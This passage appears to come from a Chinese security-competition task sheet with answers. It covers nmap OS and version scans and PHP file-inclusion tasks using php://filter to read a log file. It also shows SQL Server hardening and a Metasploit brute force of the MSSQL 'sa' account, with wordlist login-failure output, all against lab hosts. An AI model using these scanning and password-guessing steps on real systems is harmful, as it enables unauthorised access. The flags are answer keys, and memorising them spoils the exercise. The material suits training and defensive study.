| 100024 1 910/udp status |_ 100024 1 913/tcp status MAC Address: 00:0C:29:62:80:73 (VMware) Device type: general purpose Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.28.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
Flag:seconds
5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗
透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交; root@kali:~# nmap -O 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 20:13 EST Nmap scan report for 192.168.28.122 Host is up (0.00044s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind
MAC Address: 00:0C:29:62:80:73 (VMware) Device type: general purpose Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds
Flag:Nmap –O x.x.x.x
6 / 15
6. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及
版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交; Flag:Nmap –sV x.x.x.x
7. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及
版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交; root@kali:~# nmap -sV 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 20:17 EST Nmap scan report for 192.168.28.122 Host is up (0.00014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 111/tcp open rpcbind 2 (RPC #100000) MAC Address: 00:0C:29:62:80:73 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds
Flag:OpenSSH 4.3
任务3.Web应用程序文件包含安全攻防
任务环境说明: ? ? ? ? ? ?
服务器场景名称:WebServ2003
服务器场景安全操作系统:Microsoft Windows2003 Server 服务器场景安装中间件:Apache2.2; 服务器场景安装Web开发环境:Php6;
服务器场景安装数据库:Microsoft SqlServer2000; 服务器场景安装文本编辑器:EditPlus;
1. 访问WebServ2003服务器场景,\
Content\,分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;
2. 对该任务题目1页面注入点进行渗透测试,通过php://filter协议使当
前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交;
7 / 15
3. 对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方
式回显内容作为Flag提交;
4. 通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容
作为Flag提交;
5. 进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,
使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);
6. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;
任务4.数据库安全加固
任务环境说明:
? 服务器场景名称:WebServ2003
? 服务器场景安全操作系统:Microsoft Windows2003 Server ? 服务器场景安装中间件:Apache2.2; ? 服务器场景安装Web开发环境:Php6;
? 服务器场景安装数据库:Microsoft SqlServer2000; ? 服务器场景安装文本编辑器:EditPlus;
1. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft
SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;
2. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft
SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交; C:\\Documents and Settings\\Administrator>netstat -an
Active Connections
Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING TCP 192.168.28.131:139 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 *:*
8 / 15
[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$% (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^ (Incorrect: )
9 / 15
UDP 0.0.0.0:500 *:* UDP 0.0.0.0:1434 *:* UDP 0.0.0.0:4500 *:* UDP 127.0.0.1:123 *:* UDP 192.168.28.131:123 *:* UDP 192.168.28.131:137 *:* UDP 192.168.28.131:138 *:*
Flag:LISTENING
3. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务
扫描渗透测试,并将扫描结果作为Flag提交; msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > run
[*] 192.168.28.131: - SQL Server information for 192.168.28.131:
[+] 192.168.28.131: - ServerName = SERVER
[+] 192.168.28.131: - InstanceName = MSSQLSERVER [+] 192.168.28.131: - IsClustered = No
[+] 192.168.28.131: - Version = 8.00.194 [+] 192.168.28.131: - tcp = 1433 [+] 192.168.28.131: - np = \\\\SERVER\\pipe\\sql\\query
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
4. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务
超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交; msf > use auxiliary/scanner/mssql/mssql_login msf auxiliary(mssql_login) > set username sa msf auxiliary(mssql_login) > set pass_file /usr/share/wordlists/metasploit/password.lst msf auxiliary(mssql_login) > run
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^& (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^&* (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!boerbul (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!boerseun (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!gatvol (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!hotnot (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!kak (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!koedoe (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!likable (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!poes (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!pomp (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!soutpiel (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:.net (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:00000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:007007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0th (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1 (Incorrect: )
10 / 15